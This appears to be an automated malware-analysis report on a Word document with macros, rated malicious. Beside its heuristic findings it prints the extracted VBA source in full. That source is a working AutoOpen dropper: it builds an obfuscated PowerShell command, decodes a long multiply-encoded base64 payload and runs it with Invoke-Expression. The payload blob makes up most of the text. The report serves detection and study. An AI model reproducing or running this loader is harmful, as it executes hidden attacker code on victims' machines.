MALICIOUS
112
Risk Score
Heuristics 6
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set fso = CreateObject("Scripting.FileSystemObject") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 20176 bytes |
SHA-256: dbf0839c3aceae645c690bf48e1ac9d1e8056f5b36358a9ddc297e9db35ed4f4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
383 of 420 identifiers look randomly generated (e.g. 'VWd2VaVFhXR2VXbFNseVZZTlRqV3lX') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Dim msgBoXX As Object
Dim XTukL, XCsmNd As String
XTukL = VVV
XCsmNd = Replace("poXXXweXXXrshXXXelXXXl", "XXX", "") & " -Command " & Chr(34) & " $t= " & Chr(39) & XTukL & Chr(39) & ";$x=$t.ToCharArray();[array]::Reverse($x);$n =$t.length;$b='';for($i=0;$i -le $n; $i=$i+2){$b=$b+$x[$i+1]+$x[$i]} for($i=0;$i -lt 10;$i++){$b=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($b))};Invoke-Expression -Command $b" & Chr(34)
savefile XCsmNd
End Sub
Function VVV()
Dim str As String
str = ""
str = str & "==PQE9TVZWbFRVUlJHU25OVG14MkFS"
str = str & "VmdselBZYTRoRmJhTnVGRmpKVmZIek"
str = str & "ZWRlNEV2AxVjJHbFdWeFZtVFVOYUxy"
str = str & "RmNWUnVsaFdSV0RYRWhaSX1XaktaVm"
str = str & "hZbW5NaEFHc2ZOZFpLVlFacGJGVWRa"
str = str & "Y0ZyMkFWUmkwelxwVmlobTZXcEYxV1"
str = str & "xSVWpVMFxSaGNGeGAwVTBPbXdWcFJr"
str = str & "aVZSWkRyMWNjRllqaF5STWxXRWdjSk"
str = str & "Rtc1VkWkVHMDtSRmJtRVZwUkpvVEFZ"
str = str & "SmJGUmhwU1ZXMkFUMDZtMF13VmRORm"
str = str & "pha3NsYWRGWk0wR0ZiaFVsSFJKVTRr"
str = str & "bXlVSk1sVENoWTpyVl9lSmRUVFdSYk"
str = str & "pYa1RUTnVHQmxSVmgyV2diWldsR1JO"
str = str & "YzpLa1BWaF1uVkZaZUp0RldXMUZteV"
str = str & "xaVmZqekRjbHdWU1RKWVhZR2ZXaFNY"
str = str & "eVZZTUBLbX9WSmdFV1xOVWpHR09TZE"
str = str & "pFTFhoYlJVbEhVMUYwd1BoWTB6bHhS"
str = str & "OVNFWGxaV2Z3bFlZbFJUWGNkYTZzV1"
str = str & "NZcEZXWlFKTTRTbXVVWnYxMVpBVWBo"
str = str & "bHdSbFNuR1ZkYVhvR3FWUj1XU0RGVl"
str = str & "JWRlNOUklsWF14UmZoWFdNVXIxa2ZW"
str = str & "V1ZIRFNNeFNHcmZKUlp3VVdUSkJGWm"
str = str & "ZoY0ZzbUdVNVYyelZKTVZrbUNWZH5W"
str = str & "V0xSVWVwRTNiUlNuV1dOWVZhbFJWSj"
str = str & "1saExwV2ZzRlFXRmZETFpWTWhXa2dX"
str = str & "WXQxa1FoVTB4bH9WOUFHc2ZsVkFvbT"
str = str & "hVWmJsWGhoV1V4VlRZMTZtMlVvUlhU"
str = str & "RmdjRkIyR1BkVTpya1dhSlVuWVJKVj"
str = str & "BXV3ZVcFJraVhkWkBWVnNOWnlrWVps"
str = str & "VnhObGdVZE5Ga0d4V1ZWellhUmpGc1"
str = str & "ZWZVZOakNVRjJUV2pWUWFZRT9hMWYy"
str = str & "els1VmlUazFTVnRGU1VkVFhYV2hScG"
str = str & "dYc1ZaWVF3bTpWd3EyV2doZEZIbUdW"
str = str & "WnUxM1hoYllXazZXWkYxa1d4VlJIbV"
str = str & "pWZFVGWGxkV2hLV39UaGJHVW5WVWZX"
str = str & "bVdWUkdWb1hCTVRoRmNiRnRWYWRGVl"
str = str & "BQVnVNZFFrdVZaV0M1bXhVcHJsVF5k"
str = str & "VmZyRl9XZGlsWVs1YmRYRWhaTX5HS0"
str = str & "xSVmN3bmhNZGFGSGZwU1h3bXNVcDZs"
str = str & "YVROY0pzVltWNUVXMVtwUm5pbkVUbF"
str = str & "NGR1hwWVpyRUFSZGpGV1FkVjhTV3dW"
str = str & "cHJraVxWVmJ1Rl5lSkVqTFxKVm5Yak"
str = str & "hSSXFWa214VWkyMUxWWmNrVVZaTURS"
str = str & "VWFUeGEyVGhoU1V4MkhSSXZqWVVwYk"
str = str & "BXRnVaSnZWc1BaVjhMWGZiOVNtc1dK"
str = str & "VkVPbTVVRjZsTlVwY0p0MVpkTmVqcF"
str = str & "s1UmJsSFhaSXUxa1pCVmhvR2lXVmRs"
str = str & "RVdOZUFGMjZWaH1uV0ROYkpyRkBhZD"
str = str & "pFSVxwUmZOekhjUlZGU1xoWWpTa1hi"
str = str & "ZFpGeFJJUzF3bTpWQlJuTlZOYkBIbH"
str = str & "NjWlpFaFtaZWpWbkNXWndGR1BaWTB6"
str = str & "RXViZFduclZsU0MxV3FUWnJVU2xWV2"
str = str & "pHMVdTUkdWWlVKU0BUR3daMVNrR2RK"
str = str & "VkJobldNVlFEWWJKVjhrbXBVcD1Wa0"
str = str & "xaV2xWRmNWSllUYV1SUmhobGhXUXEx"
str = str & "b2d4VlpKRl5SaEpHRldOZEZhRElaSn"
str = str & "ZFWlhCTlpyVk9hVmkwNFxsVmBObnVT"
str = str & "ZFdWb1BkVjBwbHxSSmNuV1FaUzBLbX"
str = str & "VWaF0yV0ZkYk5GMkpkRlZqclZaVl5a"
str = str & "REhkSkJHa2VoWlowbFhWTlVuc1ZWY1"
str = str & "Rva2lZNVJrVGhoU1V4MVFWdGZtYVNC"
str = str & "YTxXR2hiRkMya214VWBQa3dhSlNIc2"
str = str & "ZaV0hrbGJVbz1WV0c5TlV5RlNTZFRW"
str = str & "WFVaVkpXRlhiSX1WekZkVkp4MUlSUm"
str = str & "Zsc1FkYzpPakBZQlJYV2ZsZUZ0MldV"
str = str & "ZHlVWltwUmRYa2FTbH1Gdkd0WVBYbH"
str = str & "RhaFdYc1FSYTQ0a2ZWQjEzV2xkVGR1"
str = str & "bGFSWmVrdldSVlhVRmhlSkdHYVJ0Vj"
str = str & "Y0VldNZFdsR1xaZWhabX9WeEIyaFNw"
str = str & "YT5zV0RZMTZHTVFwYTpobFVRRnVsSm"
str = str & "RGWVZUalZNcFZuRVsxYWJTa1lXUnJt"
str = str & "T1hoUVJVRlNXNUVtb1JSYTJVbllUTX"
str = str & "VGd20wVmcyV2liNWdrc1ZaUlpLakRW"
str = str & "VjZsWltSU2pzVlNWWnkwWFRGTUZoV0"
str = str & "ROVnZsNFZkVFpWVVhiSlJIR2FaUzJh"
str = str & "VE9WVmF6aWZSWkpHMkNWWndWaFhSYl"
str = str & "ZXVEZXSlZGc1tkV2B6VnpNZGJsNlZs"
str = str & "V05vakhWUmJYaFhwV1RzMWFkYzZseF"
str = str & "tZZWRobGlUVkVXWmBaVjIzM1VWOVVt"
str = str & "WFZKWVZhMFhZUl1XVkhoTUp0MVtWWk"
str = str & "lscFdoYkZVblhXSXExR2hwVlV3a1dl"
str = str & "ZFNGdWZGV1V4VVhZcGZWWltkUWp1Rk"
str = str & "didHYyV15CVm5qRkNhbHdGYVtaVWBx"
str = str & "a3hiZFJseVZRWVowakJWST0waEZkWk"
str = str & "pzVkdWWkVsM1xwVmpYWFJORnZtb1Va"
str = str & "WVBJVXZiTlZuclZkU0RTVmZUUldHTl"
str = str & "5SV2VzMD9ReGZXd1ZwYkRTR3JhVnNG"
str = str & "U1ZkV1poa0dhZFZYRlZaYVhhbXpVcE"
str = str & "JVT2t0V2RXRm9VSmlUYVxKYWRXVmJN"
str = str & "Vn5Wd0ZjVlI0SEdiaFRGRmdWV0ZTak"
str = str & "xZaEJYVmc5Y0pyR0tXdGZXNVVsTVZo"
str = str & "bUFSWnRsQ2ZoVFhvMmFSZGNreVJNUj"
str = str & "pha19XcGJWV1xkU25JMkFWWmdWel5S"
str = str & "TWJWRFJiSnYxMFIxVjJ5V15NTkVIdG"
str = str & "FWYzJXbF9VNWNFaVhoV1V4MVNhcEZt"
str = str & "V1BKTTxobWdURkJtd1VaWlBTa3phaF"
str = str & "FHWWJKVjBPbXdVNUZraFs5V2xWbGtl"
str = str & "eEZtclU1YkhYM2NhVnlXMFZkV1BYa3"
str = str & "lSTmZsc1ZOZVZaakJVaHIzV1hwV1pX"
str = str & "VlthWmQxV1RWUlZYbUdXWXZGR1xSWW"
str = str & "xYemJhbFpFc1FSVTkxaklWcFJGTm10"
str = str & "UmJIR1tXeGpXTFhSYlJabFdXSXlWS1"
str = str & "c1VkVIVTdNaFkzc1ZaVFZ3a1RZUlZt"
str = str & "Tl5KVGF4MlJkcEZteVhCTVBoRnJjZH"
str = str & "QxSmtaVmV3akdNaFVGdGZKVlVrbTZV"
str = str & "eFZtWlc5WkpzRlNVZFYwVVJSYThURm"
str = str & "diNUMwd10xVmJaWENWaF5WckFaYzpL"
str = str & "RVJaWnFrV2xSV2ZyMk9WaGZGNlZsYk"
str = str & "5YSEhlWl1Gd0taWWJWM1hSTmduR1FO"
str = str & "UjZTRlZWSnIxaVZoYURZRmdlVXRscV"
str = str & "NSVjZYRlVhMXUwR1cxVkAxVndNOVpF"
str = str & "V1ZkTUJGbFhZWlJGUm5WU2JzMVRhZD"
str = str & "ZrNFxwUmhpR3djVkVXWmJ4WTAzVnVW"
str = str & "RlFtSVxOYWhLVmlUcHJsTl10VmRXbG"
str = str & "dOWnlrVFRsUlRha2hVZEUxYV14VmpV"
str = str & "bEhNcGJGc2ZWZVRGMGBWVl1qVkRSYk"
str = str & "FyVTtWaGRWMFZwYklXVzRNbHQxU1tk"
str = str & "WWVTRTFTaGdYR11WZWN4bGZWSl0waE"
str = str & "d4Y0ZHR09TSkVqTFtwYWBXbnVVMXZr"
str = str & "a1xWVGB5a3hSZF1VeUFZUjhDVmRUWl"
str = str & "JVU25GVm5zMk9VUkdWVlFwYThpbGVU"
str = str & "WndGeFdzWlByVndNOVNHVmZKVkpTMF"
str = str & "BZNTZrWFNoYzt5RmdTdHlXYVxwYmpY"
str = str & "a1hXWXExNGRKVlcwbXlSVmRGdGxkUm"
str = str & "Z3akhVWmFrVmhKTlpyMkdVdFYySFtw"
str = str & "VmBOSHdaZFdGNFtkVmpwRkViVlRuV1"
str = str & "1WV2BHV3JXcDJWV1xkUWRVbGhWQXZq"
str = str & "M1NoVjpWa1VRSnJGd214VWpWbEhSTl"
str = str & "FGc2ZsV0ZLMFBWcFExVGhsVlV4VlpN"
str = str & "dGZtWlhCUlVpRTRhSnRGYWpGWXByVn"
str = str & "dSUlZrVVJKVjhvV3pVcEYwV1VkTlV5"
str = str & "bFdlUlRVVVdSUlJqblNXMXEwMV0wVm"
str = str & "pZa0NicFNtdVFOYzExakJVaHJYV2pO"
str = str & "VmZybUtUWmlVelU1TVZqbUJXWnNsV2"
str = str & "dwVFhYR3xTUmNuc1JGUjpTVldWaFYz"
str = str & "TlZkWkJJR1NkWnYwdldSTUpXbFhVWl"
str = str & "QxYV10VmY1VkhiZGNFdGZaYUpvakBW"
str = str & "eHYyT1ZaTlpyMUtTVmdrVVhCYkZTbU"
str = str & "dRTkMyYWZaV10xM0dWbFNGc2xaV2JD"
str = str & "RVVaVjJsWFtkVWJWRlNXMVltVlZaUl"
str = str & "RqVmdOWX1Ga0taVmJaM0NhTlJsSFxw"
str = str & "ZWRGVWtaWkVrVmdoYUl6RlNXeHUyNF"
str = str & "tsVmlobTZXbFdsU1ZkVFpUVVNiVlNF"
str = str & "R2FkVTBPbXlWeFVtU21wV25yVkZlRl"
str = str & "lqNFdOYkhXWGVWWlRsa1d4VkAxRX9i"
str = str & "ZEJsVVFSTTZhVEhZaFJHVGtaV2RHMW"
str = str & "RhSjZUWVFwYTpObFVVcEMxYWpGVmpo"
str = str & "MVdhUlFGSGJKVTRvbXlWWlJWWG1GVm"
str = str & "pybFJlaERWb1hCYkhTa2hTWlMxeF0w"
str = str & "VmpVbF5hWkFGR2dWZEhhMnhWRkZ6Vl"
str = str & "xaVWp0bE9UUkdrelZwTVZVekRjVnFG"
str = str & "NGRKWVhUR3hXZFJGV2FsVjEwbTJWUT"
str = str & "1tU0ZoYkR0MWtSSkl6UF5oTWhaRXdj"
str = str & "WldsQ114VmZ4ekdhOVZtc1ZSZVR3bX"
str = str & "BVUnJYa1xoV2ZXMlRkMTZtelRWVlhT"
str = str & "bWlTSkIya1RGVlJyM1hWbFNGeGdFYV"
str = str & "pva1pXUnJtbFs1V2RXRmNSaElsWFZw"
str = str & "UkxhWGdTZEMxa2J0VjZJRFdNdFRHdG"
str = str & "xKTmpzRVNWcDZWVVZoY0pyMkdWeFUy"
str = str & "MFZwTVRUSGJhZHQxQmROWVhUR2diVl"
str = str & "1VVk1WVmE0bTdWVXZFaVZkYkRzbGFS"
str = str & "RmZqcldoYkJXRFJiMXZFR1cxVVB4bH"
str = str & "ZSTlFFc2ZWVlJhak9VeGJHWGhoV114"
str = str & "V0FZRmZqdltwUmxYR2NaRnZWV1d4Wl"
str = str & "pha1dhaFRYelFJVjZvMFNZbD1VaERC"
str = str & "ZEl5bFdleHVtb1psUn5oSEdiZEMxMF"
str = str & "cxVlp4bEhNUmFGc2ZkZURGVWxUQkJY"
str = str & "V2RKU1pyMkNVZHlVelZKYkRTa2VTcE"
str = str & "VWd2VaVFhXR2VXbFNseVZZTlRqV3lX"
str = str & "OHZXTldoT1ZIV1plWlUwSFZKYkZXbU"
str = str & "ZTSklWa1J0VjBYVnRNZFVrR1ZaVlZL"
str = str & "VERUeFIyaVhOWkZHbVdTcEZtTVVKU0"
str = str & "hYRmljTlYxS1RKVlByVnVNQl5UVkAx"
str = str & "YThrbGdWeFJtVV5kUmxVVmNZNUltWV"
str = str & "1SVmROWGdXNVVrS21wVmJZWElSTmRs"
str = str & "R11SUmRXRWhacG1WV0V4Y0V4bUtWaE"
str = str & "pVSVdSTVlWRzRkVn5WR0pGVWhQMmpN"
str = str & "TlduR1A1YzpXRllWWlZGU1dwYUpyRk"
str = str & "dkMVZHcltKYWpXRFRhSnRtd1d4VkJ4"
str = str & "bVxSWmNrcVZaU0BHV3hUUlJXalZaTV"
str = str & "pWRldNVldWWVtwVm5ObEhSUkdHU1ta"
str = str & "VmV4MVphUldsR1dKV0ZrbFNUbD1raU"
str = str & "RSWkl4bFdXVnVsWVd4YlRVa2RSTnlX"
str = str & "YVRCVlB5VndSZFFGcmZGV1pLakFWTT"
str = str & "1HWkZoY0FWMDtWeGYyNFxGUmZOVEdW"
str = str & "UlNWU2xoVWhzbWlSTmRueVFVVDF3bT"
str = str & "pWQlJIU2ZkTl5yVkhXc3VtSFVwVkha"
str = str & "bWhXRXdHR1hwWkBJa3ZNRlN6SGFaUj"
str = str & "RhV3FUUnJHWGNkYTFHazBkZDdWWFZw"
str = str & "UlhUR2liSlVWVmpGWWF3R1diRlR6SG"
str = str & "JKVTU1RVlaWkYxbFxwV2pXRlFUWmRV"
str = str & "WFZKYkJWblNTRnQyMVpJVmpZVkdiNV"
str = str & "NFWWUxZEphRlRWaEEyWmZoYUp0Rkth"
str = str & "NUYyWFA1UjpsRURjWnVWQ201VWJPbk"
str = str & "FSZGRreV1RU2ZhVlhXMHdFaVxkVGJF"
str = str & "R1FkRmZEclZwVlJhRENjWndGT1d4Vk"
str = str & "hWbXdSRlRHdGZsV0RTbGhVUmJtaVho"
str = str & "V1FHRTdlMHZtWlJoVjVpazdURkMyYW"
str = str & "pGVWJIV1dNUlNGc2ZaWVU1MFpZcHJs"
str = str & "WFZOZEZYbFdXdHRXWFZaUkhObGNWTn"
str = str & "QxMGZkVkpZRklXaGRsdVFWVjRXVmhX"
str = str & "UmYzWF5oU2l4Vk9hWmdrWlZwTV5TbE"
str = str & "VScEdGU1xoWWhYMmhSbGNYV1JGVTo0"
str = str & "VEhWQXJIU210Ump0bEdORlRUM1NSVj"
str = str & "haRmhhSkdHS101VmpJMFpWRlRHeWFZ"
str = str & "UzZ3VlhUaFIzaltkVmJIMlFWQmZqTV"
str = str & "hCTVBoRndaVkNHS10xVmJ2M1dSaFNF"
str = str & "cmsxYWM1V3hWUlZtVFxkVWpzMVdUeH"
str = str & "VtclJoYThXRWdabFIxd1FkVjp2RU5X"
str = str & "aEpHc1ZGZFpXRVxacEZWWlhwY0V4R0"
str = str & "NXUllrWFRGTUJWREhkWldGd114VWhQ"
str = str & "R2JXRlZuR1JOVTRrV3pXcF1WaExOVW"
str = str & "p1Rl9kWkRrclhSYlBXRXhjRXFHMWJz"
str = str & "VjpIVVpidGVHeWZrTkZHa1hWcFJrV2"
str = str & "xWU2p0VlRZSjZUNlNCYTRXRmhkNVVV"
str = str & "WmpGVmhMWGZibFVsSFFOYThTa2hZcF"
str = str & "1Wa0RCTVRYbGdXcFlYcFxwUmxobGhX"
str = str & "WXMxR2ZSVlBVMXhhZGRGcmZGZFZhVE"
str = str & "BWcFJGVWVkTll3RktWVmdrNFxsUmRW"
str = str & "bmJXbHdGd1BWVTpvRl5XZEdYR1U1TU"
str = str & "JLbFlWSkNFaVZkWklXRThXVXpWV1Fw"
str = str & "YThVbGdXSkdta1xaVGVHazlSTm5WeU"
str = str & "ZZU0RTVmdUUlJYWGtkV2RHMWdTUkZG"
str = str & "dl5CUmJpRlZiTkVHWmZaV1JIM0hWbF"
str = str & "FIeWAwVjhvbXhWNU1rV01GV2xXRm9W"
str = str & "aGlsV1taYWRUVmdNVXExYWZaVk93Rm"
str = str & "NiNVdrdVxaY2phMFhWWmExWmxoV2pH"
str = str & "R09WaGZsNFtsUmBsbXNXWndGd114VW"
str = str & "ZUVFtSaGRreVFJVjJrVE9WQmZuV1xk"
str = str & "V2VZazdjMUZtdlZwYkRVRWdjSkZXR1"
str = str & "IxVjpYbExWRmFtcVZaVUpTVEFUcGJr"
str = str & "WGVkTlV3VkdNMHZtUVJoTTxXbWNWUn"
str = str & "RWU2pGVmpoa1plaFFrWVJKVjBLMndW"
str = str & "cEZsaFdGZUZYbFdXcFlYcVhSVlJObl"
str = str & "NXUnlXYVd0V1pXbEhNaGRsWVAxZDpG"
str = str & "RERaQjZ6V1pSUWpJMkRWMTYyeVdSTV"
str = str & "BrbHdXa3Rsb2tkWWBhbH9WSkNudFFa"
str = str & "Yjpva1pWaFJYU2U5ZEZIV1plWlUxM1"
str = str & "FaYTlaRThhSldHT101VmE0azdNRlZt"
str = str & "clZkVFhDa2hZaFJHWGtsUmZ0bVdXcE"
str = str & "ZtRVtwUmBORnZhTkQySmBaVjF3V1pW"
str = str & "ZFVGSGdKYkQwMnhWSl1WVUZOWkxyRm"
str = str & "FXVTUwcF1SUmhhWGdUbF1Ga014VmAy"
str = str & "VXhSTlVsc1ZKZEpTRlhacGZsYVV0Y0"
str = str & "ZybUNXUkZWSVtwTWRXa2dXa3VWd214"
str = str & "VmJvWFhiTlVueFZJWVhXV3hXSndGaV"
str = str & "xOUmR1MWFSQTVqWFhSYlhXbGZWRjFH"
str = str & "a214VmV6azxWcGdsc1ZSY1ZLa1lWQl"
str = str & "dIWFVkTVV3MVtidGYyNlFKUjBpbXlU"
str = str & "VkdHd1RGVFh2R2piZFdsR1dKV0hhMn"
str = str & "VVVj1WV0RSTVp0VldTWnlrWF5CUmph"
str = str & "bkhWWXExNGpKVmIyM0hhWmZsc1ZGV1"
str = str & "RLbGhWaFEyWGRSYkFXMDBVVjkwWV1S"
str = str & "VmRsa3VSUldGb10xVWJxMldhaFVreV"
str = str & "FZYTpXMVVWaD1tTkZkWkZHV0tkeGky"
str = str & "aFtaYWJXRkVhMXYwT1tSWWB6a3dSOV"
str = str & "Zrc1ZSTUQ0VmhUbFZ6Tl5SVm5XMktV"
str = str & "eGZXb1xKTWRoRmlhUlVWUmRGWkpya1"
str = str & "dhbFEzd2dFYVprbFlUNX1VakxkV2Zz"
str = str & "MV9NNWRXYVdoYlpYa1dXWlIxNGRKVl"
str = str & "JJM05hZERsR1dWV0hXMnNWSjFrVmxo"
str = str & "VWl6MUNhNVZtWFRWTURqbGdXWkVWS2"
str = str & "d4VFBvbHFSSmpIeFFZVTJHVlRWRjVr"
str = str & "V2xkUW5zRkplWklWVFFwYTxabmNTWn"
str = str & "JGMWJzVTkybF9STkVrc1ZsV0hhbXFV"
str = str & "UnZtTltaUmF5R1tOdGZtWFFwYThsR2"
str = str & "hjRkVtTmBkVThoM2FSWmVudFZaVlpr"
str = str & "MFhZcEJVV2ZOTlV5RldOWkRWVlVaUk"
str = str & "JObldXZFQxMG0xVmJQSEdiQlFGcmZK"
str = str & "ZVpOakhWQkdIWFpKUWpZMUdWWnlVSF"
str = str & "BaUjRYa3dXZFRsb2ZkVFpXRk5WWk1W"
str = str & "d0dFTUZrbFdXQXZuTlxkVGJyVlNWWn"
str = str & "YwMFtvYWhWbWlVRXUyc1ZoVkY1bEpW"
str = str & "UlpEc1xaU2Z3VlhUVlJUYVtkVm50Mk"
str = str & "FWVmdrb11oYmRObGZVRkRXeG1zVmh2"
str = str & "WGZiWlNGV2AxVjU1bFBUcD1WTkRCTV"
str = str & "p0MVNjMVltWVdSYkhWWGhTbF1Ga0J4"
str = str & "Vjg0MmNNaFpGc1ZSZFpPVVdaWkFrWm"
str = str & "hkVVFYMDNWcFVXMVtwVmJoRFdaa3NG"
str = str & "Q1ZoVFpxVVNiWlJER2FWVTB4bTpWcF"
str = str & "JVV1xOV2RxMWtSRml6aFxaVmZYeklk"
str = str & "RXYyb1FkVDJ5R1piTmVIeWZZVEhvbG"
str = str & "hZNVNFaltaU2RIVmRZZDZsNlRWTUBX"
str = str & "bHVRcEYxa1FaVjZEVFZiUlFsWVdKV0"
str = str & "prVlNURjJWV2VkY0RZVmNlaElrVFdS"
str = str & "YkZXa1hUVkJtS11wVml6RVlWWmFscV"
str = str & "ZWU0pLVEJWVn1qV0hsY0FXazVUYzlV"
str = str & "eld4TVlXbTFTWnVGd110WWhUR2hiaF"
str = str & "NYSFAxUzhTbXxWQkZYTlZkTlZGR0VX"
str = str & "VTUwVFdSTUhWR2djMUZrNFBWWTBIVX"
str = str & "hiTldsVlZwV1J3akhWUlIza15SV25X"
str = str & "MUtVWmZGWVZwTUhTR3NhZHYxU1RGVV"
str = str & "F4ekdWZFNuclJKVjhDV3FWcD1WU0ZO"
str = str & "WkRXRmJNSllUWFtwYWxSVmZNRkQyYW"
str = str & "ZWV1pYbFhlcGFHemdNV0pzVVNWcDJG"
str = str & "V21oU2pGbEthWmRWV1ZwTVZobUVRZF"
str = str & "lWb1pOVmhPV3ViZFNFc2JOYzBHbX9W"
str = str & "aGdHaVZwYUZzVlZlSkZqVFpWVnZXRF"
str = str & "ZiMVZrQ1JwVTB4RndidFZrd1ZVY0FT"
str = str & "bTBWcFNFYVhoU1l4MUFhdGYyUltKYm"
str = str & "RXbGhSUkJtT1VkWlBHa3dhSlFIWGAx"
str = str & "VjpvMFlZcHJGWGpWY3pYVlRlZDRWWF"
str = str & "1SYm5XSEdiZEUxT11wVmhRM2hSaFFG"
str = str & "WWZkZUpOa1RUTjJHV2xkV2pHMVNVMX"
str = str & "ZXelZwTVRTRXZacFlWYVd0WlJXR1ZX"
str = str & "UlduR1FkVjo0VEBWdzZtTlZaWkBGbH"
str = str & "tjWmUwM1tKYW5WbklRSllWYVd4VlV6"
str = str & "aztNRmRHWGZkV1ZLakBVcHJraVhOWk"
str = str & "ZHbVFXWmZGMltZZWRXRmlaTlVGWmd4"
str = str & "VkBQMXhhRlNERmJKVDhPVWlaQlJuaF"
str = str & "1GUmxVMW9WSmVqb1hCV0hTRWdabF1G"
str = str & "S01wVmpaa0diNVRFdGZWY1pPbFhWcG"
str = str & "JGVWROY0pXVlNWeFZXSVBwVjRXRmJh"
str = str & "ZHVsMWdzVFpxVVJiVldsV1FOZDEwbT"
str = str & "lWcFJsaVZoWk5yRkFkQTV6SFxKVmpY"
str = str & "RFlhSXFWa2VaWVV6VTpNdGJrRVFaZD"
str = str & "JGbFhZaFJXal5OU2RHMWFhSTZqNlhC"
str = str & "YkBTR3VaZHNsc2taVmBoRnZNaFFHSG"
str = str & "ZkVkhvbGRWVjIwTld0ZEp0bFNORnlU"
str = str & "WFJ4UjRha2lSTXMyR1hwV1JRbkdWRl"
str = str & "JtdFxkUmZhakhWaG1HWkxoUmpVMV9W"
str = str & "dEZXelZKTVRXa2ZVUlYxS1tWVWBobH"
str = str & "pSZG5Wd0dNTkN4bGFWWmZGU11sVmpz"
str = str & "VktkWmpVYVVaVkpWSFlhSlYyR1d4VV"
str = str & "Axa3hWTmVGWGZaTVh3bXNVcHJGU2xW"
str = str & "V2RHMWFiYzZGWVZwVlhpRmJaZHVGVm"
str = str & "pGWXJyM1hWcFVGdGdWYUF3RzpWUn1X"
str = str & "ak1GV2l3RlNhTlZqaF1SUmRqRWhaUX"
str = str & "MxMVcwVlcxR3diOVdrc1FaVjZrRENa"
str = str & "NUZFWlZoYUl5Rl9VdGVtNVxsVmZaR0"
str = str & "hkWk1GWktaWWpYRlJiVlRueFJNUjRr"
str = str & "bXlWWkFsTmZkYURzRmplRkZEM1dSUl"
str = str & "xhbGRVWnYxNVcwVkB4bHpSZGZuclxs"
str = str & "VmhhbXdZaFdHWFZkYkxXVmFZdGZtWl"
str = str & "VKU0hOR2hhcEIxT1cxWlBLa3dheFdr"
str = str & "clJGVjJPVVZZbD1VV0d0ZEl5RlNOeH"
str = str & "VtcFNSUj5obkdXVlQyNGcxVlp6bFhl"
str = str & "UmZsR1JKVjpzVlZUUjZtWFxsUWV6V0"
str = str & "9hWmdrR15CUmpsa1FTbH1GUkRKWVhY"
str = str & "MmhNZGNreVFVYzZrVlZXcDJraVZOWk"
str = str & "FWVTJleHpXaFNSVjZhbUdTSkZtc1xo"
str = str & "VWIwV1pNRmFtVVZkV15DVEhZQlZuUF"
str = str & "taUml5MVdVUkZGSV5CUmBpbHdUNVJr"
str = str & "S1BkVjh2V2dNaFNsV1UxYVQwV3hWcE"
str = str & "ZsV1t0UmZxRltjWklrVlxaYmhYWGlU"
str = str & "UXMxd10xVmJ2SEhNaGpHc1ZGVlhrbX"
str = str & "xWWkFrV2doYUF1MDdWcEZXMFtwUmZp"
str = str & "bUJWZH0xc014VWJYM1hhTlZuR1JGUz"
str = str & "QwVmpXVlJUWFs1U2R1RmZlRkpENFRC"
str = str & "YlxXRWZjSldGMVtVV2B6RX9iOUpFRl"
str = str & "ZwV0p3VVhUSlJGU2xWU2R0MWFjQmdU"
str = str & "NVhCVlRpRmRkWnNsa2taVGp6bFVWSl"
str = str & "ducl1WV2VPMjhWUk1XUkRGTUpYMV9k"
str = str & "SmZqcFZaYkZVblhWWXUxS1tSVmBvMH"
